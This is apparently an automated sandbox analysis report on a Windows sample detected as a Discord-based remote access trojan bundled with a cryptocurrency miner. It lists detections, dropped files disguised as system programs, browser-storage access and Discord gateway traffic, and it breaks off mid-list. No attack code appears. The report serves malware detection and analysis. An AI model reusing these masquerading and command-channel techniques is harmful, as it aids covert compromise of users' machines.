Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Virustotal: Detection: 50%	Perma Link

Multi AV Scanner detection for submitted file

Source: 87Bym0x4Fy.exe	Virustotal: Detection: 68%			Perma Link
Source: 87Bym0x4Fy.exe	ReversingLabs: Detection: 60%

Yara detected Discord Rat

Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\hacn.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\setup.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\svchost.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\cmd.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 87Bym0x4Fy.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: 87Bym0x4Fy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Uninstall Information\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Uninstall Information\ebf1f9fa8afd6d

Source: unknown

HTTPS traffic detected: 162.159.130.234:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: 87Bym0x4Fy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb3+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 0000000D.00000000.1756787728.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, Build.exe, 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, s.exe, 00000015.00000000.1819435912.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000002.1899493574.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000003.1830651243.000000000718F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb-F424491E3931}\InprocServer32" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF3C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\Discord rat.pdbS source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: *indoC:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbBAz source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\Discord rat.pdbi source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *assembly\GAC_64C:\Users\user\AppData\Roaming\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Discord rat.pdbpdbp.GAw source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbk*_ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeBroker.exe, 00000005.00000003.1722658950.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmp, hacn.exe, 0000000F.00000003.1784627169.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1786292411.000001470368F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.2009594706.00007FFE01221000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDB source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbCiV source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *pC:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDBp source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Discord rat.pdbpdbrat.pdb91 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Discord rat.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb%+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RuntimeBroker2.0.PDB? source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Discord rat.pdb+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbe source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00007FF72B0579B0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0585A0 FindFirstFileExW,FindClose,	5_2_00007FF72B0585A0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF72B070B84
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0585A0 FindFirstFileExW,FindClose,	7_2_00007FF72B0585A0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF72B070B84
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00007FF72B0579B0
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B4C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	13_2_00B4C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B5E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	13_2_00B5E560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	15_2_00007FF6D55E7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	15_2_00007FF6D55E7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F1FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_00007FF6D55F1FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55D8B00 FindFirstFileExW,FindClose,	15_2_00007FF6D55D8B00
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	21_2_0055A69B
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0056C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	21_2_0056C220
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	29_2_0066A69B
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0067C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	29_2_0067C220
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B2DCE0 FindFirstFileExW,	32_2_0000023225B2DCE0
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C6DCE0 FindFirstFileExW,	38_2_0000016716C6DCE0
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E891DCE0 FindFirstFileExW,	39_2_00000245E891DCE0

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh

42_2_00007FFD9BA2D03D

Source: global traffic

HTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: pEXqwa4GxwmcjiDtvHZVTg==Sec-WebSocket-Version: 13Host: gateway.discord.gg

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: pEXqwa4GxwmcjiDtvHZVTg==Sec-WebSocket-Version: 13Host: gateway.discord.gg

Source: global traffic

DNS traffic detected: DNS query: gateway.discord.gg

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 08:57:10 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVLozOVy8Fk7BeFX7Ni1ydTRST3KHWMMR6MKVKasifwnv77VhA3Mtg5hFW0%2BtQH%2FVCmRtOxyPuvwp16IuVQL6HaAhwEALnKbf21QvYxv%2BEspwbzB1ljE%2FRv%2FZInw1sYeLWOG5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8ac49e828eb841ed-EWR

Source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coS
Source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coa
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 